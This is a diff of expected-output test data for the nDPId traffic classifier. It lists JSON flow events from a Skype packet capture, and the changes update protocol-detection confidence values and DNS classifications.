-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642969,"flow_last_seen":1431969723490,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1431969642969,"flow_last_seen":1431969723490,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1264,58 +1264,58 @@ 00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1431969716015,"flow_last_seen":1431969752089,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2961,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1431969715511,"flow_last_seen":1431969808618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":5646,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969642376,"flow_last_seen":1431969712120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":2483,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643971,"flow_last_seen":1431969670410,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969643971,"flow_last_seen":1431969670410,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969717899,"flow_last_seen":1431969784849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":1085,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 